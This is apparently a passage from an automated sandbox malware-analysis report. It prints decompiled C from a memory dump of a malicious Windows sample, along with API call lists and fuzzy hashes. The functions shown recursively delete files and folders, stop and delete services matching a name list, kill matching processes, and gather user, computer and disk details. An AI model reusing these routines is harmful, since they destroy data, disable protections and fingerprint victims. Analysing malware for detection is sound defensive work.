				} else {
					_t68[_t51] = 0x5c;
					 *((short*)(_t68 + 2 + _t51 * 2)) = 0x2a;
				}
				_t45 = FindFirstFileExW(_t68, 0,  &_v608, 0, 0, 2); // executed
				_v8 = _t45;
				if(_v8 == 0xffffffff) {
					goto L17;
				} else {
					do {
						_t67 =  &(_v608.cFileName);
						if( *_t67 != 0x2e &&  *_t67 != 0x2e002e) {
							_t70 = _v16;
							wcscpy(_t70, _v12);
							 *(wcsrchr(_t70, 0x5c)) = 0;
							_t57 = wcslen(_t70);
							_t77 = _t74 + 0x14;
							if( *((short*)(_t70 + _t57 * 2 - 2)) != 0x5c) {
								 *(_t70 + _t57 * 2) = 0x5c;
								_t70 =  &(_t70[0]);
							}
							wcscpy(_t70 + _t57 * 2, _t67);
							_t74 = _t77 + 8;
							_t59 = GetFileAttributesW(_v16); // executed
							if((_t59 & 0x00000010) == 0) {
								DeleteFileW(_v16); // executed
							} else {
								if(PathIsDirectoryEmptyW(_v16) == 0) {
									E00CE5490(_v16);
								}
								RemoveDirectoryW(_v16);
							}
						}
						_t54 = FindNextFileW(_v8,  &_v608); // executed
					} while (_t54 != 0);
					FindClose(_v8); // executed
					RtlFreeHeap( *0xcf0a9e, 0, _v12); // executed
					_t66 = RtlFreeHeap( *0xcf0a9e, 0, _v16); // executed
					return _t66;
				}
			}

0x00ce54ab
0x00ce54b1
0x00ce54b8
0x00ce564d
0x00ce564d
0x00ce564d
0x00ce54cb
0x00ce54d1
0x00ce54d8
0x00000000
0x00000000
0x00ce54f3
0x00ce5504
0x00ce550c
0x00ce5511
0x00ce551b
0x00ce5521
0x00ce552a
0x00ce553b
0x00ce552c
0x00ce552c
0x00ce5532
0x00ce5532
0x00ce5551
0x00ce5557
0x00ce555e
0x00000000
0x00ce5564
0x00ce5564
0x00ce5564
0x00ce556d
0x00ce557f
0x00ce5586
0x00ce559b
0x00ce55a1
0x00ce55a7
0x00ce55b0
0x00ce55b2
0x00ce55b8
0x00ce55b8
0x00ce55c0
0x00ce55c6
0x00ce55cc
0x00ce55d7
0x00ce55fc
0x00ce55d9
0x00ce55e4
0x00ce55e9
0x00ce55e9
0x00ce55f1
0x00ce55f1
0x00ce55d7
0x00ce560c
0x00ce5612
0x00ce561d
0x00ce562e
0x00ce563f
0x00000000
0x00ce563f

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00CE54AB
RtlAllocateHeap.NTDLL(00000000,00010000), ref: 00CE54CB
wcscpy.NTDLL ref: 00CE5511
wcslen.NTDLL ref: 00CE551B
FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000002,?,?,?), ref: 00CE5551
wcscpy.NTDLL ref: 00CE5586
wcsrchr.NTDLL ref: 00CE5592
wcslen.NTDLL ref: 00CE55A1
wcscpy.NTDLL ref: 00CE55C0
GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE55CC
PathIsDirectoryEmptyW.SHLWAPI(00000000), ref: 00CE55DC
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE55F1
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE55FC
FindNextFileW.KERNELBASE(000000FF,?,?,?,?), ref: 00CE560C
FindClose.KERNELBASE(000000FF,?,?,?), ref: 00CE561D
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE562E
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE563F

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHeap$Findwcscpy$AllocateDirectoryFreewcslen$AttributesCloseDeleteEmptyFirstNextPathRemovewcsrchr
String ID:
API String ID: 2370732766-0
Opcode ID: 2d80be84e904f531597cff310f140cf9389a98524a39846eca44efdd5ce06463
Instruction ID: f03628db5ecae05a00cac16e0cad4ee24e862c07cccf868a7e7016af17165414
Opcode Fuzzy Hash: 2d80be84e904f531597cff310f140cf9389a98524a39846eca44efdd5ce06463
Instruction Fuzzy Hash: 03419130900618FFDB21AF95EC0EBAE7B75FF04B05F204050F915651B2D7B22AA4DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4C7B, Relevance: 19.6, APIs: 13, Instructions: 117
servicememoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CE4C7B() {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				char _v24;
				struct _SERVICE_STATUS _v52;
				int _t36;
				char _t37;
				void* _t41;
				wchar_t* _t44;
				void* _t52;
				short** _t53;
				wchar_t* _t54;
				void* _t55;

				_v8 = 0;
				_v16 = 0;
				_t36 = OpenSCManagerW(0, 0, 4);
				_v8 = _t36;
				if(_v8 != 0) {
					_v20 = 0;
					 *0xcf0e62(_v8, 0, 0x30, 3, 0, _v20,  &_v20,  &_v24, 0, 0);
					_t41 = RtlAllocateHeap( *0xcf0a9e, 8, _v20); // executed
					_v16 = _t41;
					_t36 =  *0xcf0e62(_v8, 0, 0x30, 3, _v16, _v20,  &_v20,  &_v24, 0, 0);
					if(_t36 != 0) {
						_t53 = _v16;
						do {
							_t52 = 0;
							_t54 =  *0xcf0914; // 0x7c1d50
							L4:
							while(1) {
								if(_t52 == 0) {
									 *0xcf0cf6( *_t53);
									_t55 = _t55 + 4;
									_t52 = _t52 + 1;
								}
								_t44 = wcsstr( *_t53, _t54);
								_t55 = _t55 + 8;
								if(_t44 == 0) {
									L9:
									_t36 = wcslen(_t54);
									_t55 = _t55 + 4;
									_t54 = _t54 + 2 + _t36 * 2;
									if( *_t54 != 0) {
										continue;
									} else {
									}
								} else {
									_v12 = OpenServiceW(_v8,  *_t53, 0x10020);
									if(_v12 == 0) {
										goto L9;
									} else {
										E00CE13DA( &_v52,  &_v52, 0x1c);
										ControlService(_v12, 1,  &_v52);
										DeleteService(_v12);
										_t36 = CloseServiceHandle(_v12);
									}
								}
								break;
							}
							_t53 =  &(_t53[0xb]);
							_v24 = _v24 - 1;
						} while (_v24 != 0);
					}
				}
				if(_v8 != 0) {
					_t36 = CloseServiceHandle(_v8);
				}
				if(_v16 != 0) {
					_t37 = RtlFreeHeap( *0xcf0a9e, 0, _v16); // executed
					return _t37;
				}
				return _t36;
			}

0x00ce4c86
0x00ce4c8d
0x00ce4c9a
0x00ce4ca0
0x00ce4ca7
0x00ce4cad
0x00ce4cce
0x00ce4cdf
0x00ce4ce5
0x00ce4d03
0x00ce4d0b
0x00ce4d11
0x00ce4d14
0x00ce4d14
0x00ce4d16
0x00000000
0x00ce4d1c
0x00ce4d1e
0x00ce4d22
0x00ce4d28
0x00ce4d2b
0x00ce4d2b
0x00ce4d2f
0x00ce4d35
0x00ce4d3a
0x00ce4d83
0x00ce4d84
0x00ce4d8a
0x00ce4d8d
0x00ce4d95
0x00000000
0x00000000
0x00ce4d97
0x00ce4d3c
0x00ce4d4c
0x00ce4d53
0x00000000
0x00ce4d55
0x00ce4d5b
0x00ce4d69
0x00ce4d72
0x00ce4d7b
0x00ce4d7b
0x00ce4d53
0x00000000
0x00ce4d3a
0x00ce4d9b
0x00ce4d9e
0x00ce4da1
0x00ce4d14
0x00ce4d0b
0x00ce4daf
0x00ce4db4
0x00ce4db4
0x00ce4dbe
0x00ce4dcb
0x00000000
0x00ce4dcb
0x00ce4dd9

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000004,?,?,?,?,00000000), ref: 00CE4C9A
EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 00CE4CCE
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00CE4CDF
EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 00CE4D03
_wcslwr.NTDLL ref: 00CE4D22
wcsstr.NTDLL ref: 00CE4D2F
OpenServiceW.ADVAPI32(00000000,00000000,00010020,?,?,?,?,?,00000000), ref: 00CE4D46
ControlService.ADVAPI32(00000000,00000001,?,?,0000001C,?,?,?,?,?,00000000), ref: 00CE4D69
DeleteService.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 00CE4D72
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 00CE4D7B
wcslen.NTDLL ref: 00CE4D84
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00000000), ref: 00CE4DB4
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE4DCB

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseEnumHandleHeapOpenServicesStatus$AllocateControlDeleteFreeManager_wcslwrwcslenwcsstr
String ID:
API String ID: 3507208448-0
Opcode ID: 48d12a36ee441a4e37281ad59a37687522ed4ff1d7013529ee4561b913bdc48d
Instruction ID: 37e42ae258a87198539d5b8e2661ccbfe8fd89375670ec530ae61fbb039a37c0
Opcode Fuzzy Hash: 48d12a36ee441a4e37281ad59a37687522ed4ff1d7013529ee4561b913bdc48d
Instruction Fuzzy Hash: E1413731A40208FFEB159F91EC49BBEBB79FF08B01F200065F611A51A1D7B22B54DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00CE301C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CE301C() {
				void* _v8;
				long _v12;
				void* _v16;
				char _v48;
				short _v112;
				short _v176;
				char _v240;
				char _v760;
				char _v1280;
				void* _t35;
				void* _t47;
				void* _t49;
				void* _t51;
				void* _t52;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t79;
				void* _t81;

				if( *0xcf0928 != 0) {
					ImpersonateLoggedOnUser( *0xcf0aa6);
				}
				_v8 = 0;
				_v16 = 0;
				_t35 = E00CE2C69( &_v760); // executed
				if(_t35 != 0) {
					_t70 = _t35;
					_v12 = 0x1f;
					GetUserNameW( &_v112,  &_v12); // executed
					if(_v12 != 0) {
						_t71 = _t70 + (_v12 << 1);
						_v12 = 0x1f;
						GetComputerNameW( &_v176,  &_v12);
						if(_v12 != 0) {
							_t72 = _t71 + (_v12 << 1);
							_t47 = E00CE2F62( &_v48); // executed
							if(_t47 != 0) {
								_t73 = _t72 + _t47;
								_t49 = E00CE2D3E( &_v1280); // executed
								if(_t49 != 0) {
									_t74 = _t73 + _t49;
									_t51 = E00CE2DBE( &_v240); // executed
									if(_t51 != 0) {
										_t75 = _t74 + _t51;
										_t52 = E00CE2E78("8e00158debcaa4bdbc0f"); // executed
										if(_t52 != 0) {
											_v16 = E00CE2D96();
											_v8 = RtlAllocateHeap( *0xcf0a9e, 0, _t75 + _t52 + 8 +  *0xceb882);
											if(_v8 != 0) {
												_t79 = E00CE1AEC(0xceb886);
												_push( *0xcf0cfa(_v8, _t79,  &_v48,  &_v112,  &_v176,  &_v1280,  &_v240, _v16,  &_v760, "8e00158debcaa4bdbc0f"));
												while(1) {
													asm("lodsw");
													if(0 == 0) {
														break;
													}
													asm("stosb");
												}
												asm("stosb");
												_pop(_t81);
												_v8 = RtlReAllocateHeap( *0xcf0a9e, 8, _v8, _t81 + 1);
												RtlFreeHeap( *0xcf0a9e, 0, _t79);
											} else {
											}
										} else {
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
				} else {
				}
				if(_v16 != 0) {
					RtlFreeHeap( *0xcf0a9e, 0, _v16);
				}
				if( *0xcf0928 != 0) {
					RevertToSelf();
				}
				return _v8;
			}

0x00ce3031
0x00ce3039
0x00ce3039
0x00ce303f
0x00ce3046
0x00ce3054
0x00ce305b
0x00ce3062
0x00ce3064
0x00ce3073
0x00ce307d
0x00ce3089
0x00ce308b
0x00ce309d
0x00ce30a7
0x00ce30b3
0x00ce30b9
0x00ce30c0
0x00ce30c7
0x00ce30d0
0x00ce30d7
0x00ce30de
0x00ce30e7
0x00ce30ee
0x00ce30f5
0x00ce30fc
0x00ce3103
0x00ce3111
0x00ce312c
0x00ce3133
0x00ce3144
0x00ce3181
0x00ce3189
0x00ce3189
0x00ce318e
0x00000000
0x00000000
0x00ce3193
0x00ce3193
0x00ce3190
0x00ce3196
0x00ce31aa
0x00ce31b6
0x00000000
0x00ce3135
0x00000000
0x00ce3105
0x00000000
0x00ce30f0
0x00000000
0x00ce30d9
0x00000000
0x00ce30c2
0x00000000
0x00ce30a9
0x00000000
0x00ce307f
0x00000000
0x00ce305d
0x00ce31c0
0x00ce31cd
0x00ce31cd
0x00ce31da
0x00ce31dc
0x00ce31dc
0x00ce31ed

APIs

ImpersonateLoggedOnUser.ADVAPI32(?,?,?,?,00000000), ref: 00CE3039
GetUserNameW.ADVAPI32(?,0000001F), ref: 00CE3073
GetComputerNameW.KERNEL32(?,0000001F), ref: 00CE309D
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE31CD
RevertToSelf.ADVAPI32 ref: 00CE31DC

Strings

8e00158debcaa4bdbc0f, xrefs: 00CE30F7, 00CE3146

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser$ComputerFreeHeapImpersonateLoggedRevertSelf
String ID: 8e00158debcaa4bdbc0f
API String ID: 2526853888-2180724728
Opcode ID: 62bcbf14ebe3ee62bad0efb55914e10da2a73354328e826db5256eda77e5dd56
Instruction ID: d8e2e376b7aeaf37aba82d9734823a8a2b3ac99c9a80dfa7d903a74f7a8e00eb
Opcode Fuzzy Hash: 62bcbf14ebe3ee62bad0efb55914e10da2a73354328e826db5256eda77e5dd56
Instruction Fuzzy Hash: 72514E71A00289EFDB10DBA6DC89BBE77BDEB04704F204069E511E3161E775AF48EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4DDA, Relevance: 16.6, APIs: 11, Instructions: 94
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00CE4DDA() {
				void* _v8;
				long _v12;
				void* _v16;
				long _t27;
				void* _t29;
				wchar_t* _t31;
				signed int _t32;
				intOrPtr* _t37;
				wchar_t* _t38;
				intOrPtr _t39;
				void* _t40;
				void* _t41;

				_v12 = 0x400;
				_v16 = RtlAllocateHeap( *0xcf0a9e, 0, _v12);
				while(1) {
					_t27 = NtQuerySystemInformation(5, _v16, _v12,  &_v12); // executed
					if(_t27 == 0) {
						break;
					}
					if(_t27 != 0xc0000004) {
						return RtlFreeHeap( *0xcf0a9e, 0, _v16);
					} else {
						_t29 = RtlReAllocateHeap( *0xcf0a9e, 0, _v16, _v12); // executed
						_v16 = _t29;
						continue;
					}
					L17:
				}
				_t37 = _v16;
				do {
					_t39 =  *_t37;
					if( *(_t37 + 0x3c) != 0) {
						 *0xcf0cf6( *(_t37 + 0x3c));
						_t41 = _t40 + 4;
						_t38 =  *0xcf0910; // 0x7e9f00
						while(1) {
							_t31 = wcsstr( *(_t37 + 0x3c), _t38);
							_t40 = _t41 + 8;
							if(_t31 == 0) {
								goto L12;
							}
							L10:
							_v8 = OpenProcess(1, 0,  *(_t37 + 0x44));
							if(_v8 == 0) {
								goto L12;
							} else {
								TerminateProcess(_v8, 0);
								CloseHandle(_v8);
							}
							goto L15;
							L12:
							_t32 = wcslen(_t38);
							_t41 = _t40 + 4;
							_t38 = _t38 + 2 + _t32 * 2;
							if( *_t38 != 0) {
								_t31 = wcsstr( *(_t37 + 0x3c), _t38);
								_t40 = _t41 + 8;
								if(_t31 == 0) {
									goto L12;
								}
							} else {
							}
							goto L15;
						}
					}
					L15:
					_t37 = _t37 + _t39;
				} while (_t39 != 0);
				return RtlFreeHeap( *0xcf0a9e, 0, _v16);
				goto L17;
			}

0x00ce4de5
0x00ce4dfd
0x00ce4e00
0x00ce4e0c
0x00ce4e14
0x00000000
0x00000000
0x00ce4e1f
0x00ce4e55
0x00ce4e21
0x00ce4e2f
0x00ce4e35
0x00000000
0x00ce4e35
0x00000000
0x00ce4e1f
0x00ce4e58
0x00ce4e5b
0x00ce4e5b
0x00ce4e61
0x00ce4e66
0x00ce4e6c
0x00ce4e6f
0x00ce4e75
0x00ce4e79
0x00ce4e7f
0x00ce4e84
0x00000000
0x00000000
0x00ce4e86
0x00ce4e93
0x00ce4e9a
0x00000000
0x00ce4e9c
0x00ce4ea1
0x00ce4eaa
0x00ce4eaa
0x00000000
0x00ce4eb2
0x00ce4eb3
0x00ce4eb9
0x00ce4ebc
0x00ce4ec4
0x00ce4e79
0x00ce4e7f
0x00ce4e84
0x00000000
0x00000000
0x00000000
0x00ce4ec6
0x00000000
0x00ce4ec4
0x00ce4e75
0x00ce4eca
0x00ce4eca
0x00ce4ecd
0x00ce4eea
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00CE4DF7
NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 00CE4E0C
RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 00CE4E2F
_wcslwr.NTDLL ref: 00CE4E66
wcsstr.NTDLL ref: 00CE4E79
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CE4E8D
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CE4EA1
CloseHandle.KERNEL32(00000000), ref: 00CE4EAA
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE4EDC

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateProcess$CloseFreeHandleInformationOpenQuerySystemTerminate_wcslwrwcsstr
String ID:
API String ID: 2148766438-0
Opcode ID: 8ffaf42908117655fae6dabef83d4b6be8b1f02e53c6a4f1f7fa1bfc4fb63817
Instruction ID: d37845147410fed54d32d76c84d47b38df152c2492b5cee6956a3dba9c104593
Opcode Fuzzy Hash: 8ffaf42908117655fae6dabef83d4b6be8b1f02e53c6a4f1f7fa1bfc4fb63817
Instruction Fuzzy Hash: E5318132A00244FFDF159F92EC49BBEBB36FF04B11F204151EA15621B2D7722A60DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2C69, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00CE2C69(wchar_t* _a4) {
				intOrPtr _v8;
				union _ULARGE_INTEGER _v12;
				intOrPtr _v16;
				union _ULARGE_INTEGER _v20;
				short _v540;
				unsigned int _t15;
				int _t16;
				int _t19;
				signed int _t25;
				unsigned int _t26;
				unsigned int _t27;
				wchar_t* _t28;
				WCHAR* _t29;
				void* _t30;

				_t15 = GetLogicalDriveStringsW(0x104,  &_v540); // executed
				_t26 = _t15;
				if(_t26 != 0) {
					_t29 =  &_v540;
					_t27 = _t26 >> 2;
					_t28 = _a4;
					do {
						_t16 = GetDriveTypeW(_t29); // executed
						if(_t16 == 3 || _t16 == 2) {
							_t19 = GetDiskFreeSpaceExW(_t29, 0,  &_v12,  &_v20); // executed
							if(_t19 == 0) {
								_t29 =  &(_t29[4]);
							} else {
								asm("movsd");
								_t25 =  *0xcf0cfa(_t28, L"%u/%u|",  *0xcf0d12(_v20.LowPart, _v16, 0x40000000, 0,  *0xcf0d12(_v12.LowPart, _v8, 0x40000000, 0)));
								_t30 = _t30 + 8;
								_t28 = _t28 + _t25 * 2;
								_t29 =  &(_t29[2]);
							}
						} else {
							_t29 =  &(_t29[4]);
						}
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					 *(wcsrchr(_a4, 0x7c)) = 0;
					return wcslen(_a4) << 1;
				}
				return _t15;
			}

0x00ce2c83
0x00ce2c89
0x00ce2c8d
0x00ce2c93
0x00ce2c99
0x00ce2c9c
0x00ce2c9f
0x00ce2ca0
0x00ce2ca9
0x00ce2cbb
0x00ce2cc3
0x00ce2d05
0x00ce2cc5
0x00ce2cc5
0x00ce2cf4
0x00ce2cfa
0x00ce2cfd
0x00ce2d00
0x00ce2d00
0x00ce2d0a
0x00ce2d0a
0x00ce2d0a
0x00ce2d0d
0x00ce2d0e
0x00ce2d20
0x00000000
0x00ce2d31
0x00ce2d3b

APIs

GetLogicalDriveStringsW.KERNEL32(00000104,?,?,?,?,?,00000000), ref: 00CE2C83
GetDriveTypeW.KERNEL32(?,?,?,?,?,00000000), ref: 00CE2CA0
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?,?,?,?,?,00000000), ref: 00CE2CBB
_alldiv.NTDLL(?,00000000,40000000,00000000), ref: 00CE2CD3
_alldiv.NTDLL(?,?,40000000,00000000), ref: 00CE2CE7
_swprintf.NTDLL ref: 00CE2CF4
wcsrchr.NTDLL ref: 00CE2D17
wcslen.NTDLL ref: 00CE2D28

Strings

%u/%u|, xrefs: 00CE2CEE

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Drive_alldiv$DiskFreeLogicalSpaceStringsType_swprintfwcslenwcsrchr
String ID: %u/%u|
API String ID: 3181718701-448647518
Opcode ID: 8bb1143444bf1d2951d5d4778315fa3a941797b5b7aa481a1b633ce615c7c9bd
Instruction ID: da711c5e102b2fd1a72cc10469cd88e08d15039ba2b344b25e3dec522408346d
Opcode Fuzzy Hash: 8bb1143444bf1d2951d5d4778315fa3a941797b5b7aa481a1b633ce615c7c9bd
Instruction Fuzzy Hash: 8021C072900108BBEB215B85EC49FFFBB2DEF14701F200121FB05A1162DB716A11CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5368, Relevance: 12.1, APIs: 8, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE5368(wchar_t* _a4, wchar_t* _a8) {
				union _FINDEX_INFO_LEVELS _v8;
				void* _v12;
				short _v532;
				struct _WIN32_FIND_DATAW _v1124;
				signed int _t55;
				void* _t58;
				signed int _t65;
				wchar_t* _t67;
				wchar_t* _t68;
				wchar_t* _t69;
				wchar_t* _t70;

				_v8 = 0;
				E00CE13DA( &_v1124,  &_v1124, 0x250);
				_t68 =  &_v532;
				wcscpy(_t68, _a4);
				_t55 = wcslen(_t68);
				if( *((short*)(_t68 + _t55 * 2 - 2)) != 0x5c) {
					 *((short*)(_t68 + _t55 * 2)) = 0x5c;
					_t68 =  &(_t68[0]);
				}
				 *((short*)(_t68 + _t55 * 2)) = 0x2a;
				 *((intOrPtr*)(_t68 + 2 + _t55 * 2)) = 0x650072;
				 *((intOrPtr*)(_t68 + 6 + _t55 * 2)) = 0x790063;
				 *((intOrPtr*)(_t68 + 0xa + _t55 * 2)) = 0x6c0063;
				 *((intOrPtr*)(_t68 + 0xe + _t55 * 2)) = 0x2a0065;
				 *((short*)(_t68 + 0x12 + _t55 * 2)) = 0;
				_t58 = FindFirstFileExW( &_v532, 0,  &_v1124, 0, 0, 2); // executed
				_v12 = _t58;
				if(_v12 != 0xffffffff) {
					while((_v1124.dwFileAttributes & 0x00000010) == 0) {
						if(FindNextFileW(_v12,  &_v1124) != 0) {
							continue;
						}
						L9:
						FindClose(_v12); // executed
						goto L10;
					}
					_t67 =  &(_v1124.cFileName);
					_t69 = _a8;
					wcscpy(_t69, _a4);
					_t65 = wcslen(_t69);
					if( *((short*)(_t69 + _t65 * 2 - 2)) == 0x5c) {
						_t70 = _t69 + _t65 * 2;
					} else {
						 *(_t69 + _t65 * 2) = 0x5c;
						_t70 = _t69 + 2 + _t65 * 2;
					}
					wcscpy(_t70, _t67);
					_v8 = 1;
					goto L9;
				}
				L10:
				return _v8;
			}

0x00ce5376
0x00ce5389
0x00ce538e
0x00ce5398
0x00ce53a2
0x00ce53b1
0x00ce53b3
0x00ce53b9
0x00ce53b9
0x00ce53bc
0x00ce53c2
0x00ce53ca
0x00ce53d2
0x00ce53da
0x00ce53e2
0x00ce53ff
0x00ce5405
0x00ce540c
0x00ce540e
0x00ce5477
0x00000000
0x00000000
0x00ce5479
0x00ce547c
0x00000000
0x00ce547c
0x00ce541a
0x00ce5420
0x00ce5427
0x00ce5431
0x00ce5440
0x00ce544e
0x00ce5442
0x00ce5442
0x00ce5448
0x00ce5448
0x00ce5453
0x00ce545c
0x00000000
0x00ce545c
0x00ce5482
0x00ce548d

APIs

wcscpy.NTDLL ref: 00CE5398
wcslen.NTDLL ref: 00CE53A2
FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000002,?,?,00000000), ref: 00CE53FF
wcscpy.NTDLL ref: 00CE5427
wcslen.NTDLL ref: 00CE5431
wcscpy.NTDLL ref: 00CE5453
FindNextFileW.KERNEL32(000000FF,?,?,?,00000000), ref: 00CE546F
FindClose.KERNEL32(000000FF,?,?,00000000), ref: 00CE547C

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Findwcscpy$Filewcslen$CloseFirstNext
String ID:
API String ID: 3544085407-0
Opcode ID: 5fce2fb1afd6e795e48b0655a170a4cabb138e4e71947a164f9773483c80b472
Instruction ID: 577354d6ac5660cee43972cdc58a663413999b32e7d311bef4721ae9f842d2d3
Opcode Fuzzy Hash: 5fce2fb1afd6e795e48b0655a170a4cabb138e4e71947a164f9773483c80b472
Instruction Fuzzy Hash: 4731C671810628EFD7209F48DC09BFEBB78FF00705F504158E900A21A0E7B26BA8CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00CE525B, Relevance: 12.1, APIs: 8, Instructions: 82
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE525B(wchar_t* _a4) {
				void* _v8;
				struct _WIN32_FIND_DATAW _v600;
				long _v1120;
				long _v1640;
				void* _t30;
				signed int _t35;
				int _t40;
				int _t41;
				wchar_t* _t49;
				wchar_t* _t50;
				void* _t51;
				void* _t53;

				_t30 = E00CE5368(_a4,  &_v1640); // executed
				if(_t30 != 0) {
					E00CE13DA( &_v600,  &_v600, 0x250);
					_t49 =  &_v1120;
					wcscpy(_t49,  &_v1640);
					_t35 = wcslen(_t49);
					_t53 = _t51 + 0xc;
					if( *((short*)(_t49 + _t35 * 2 - 2)) != 0x5c) {
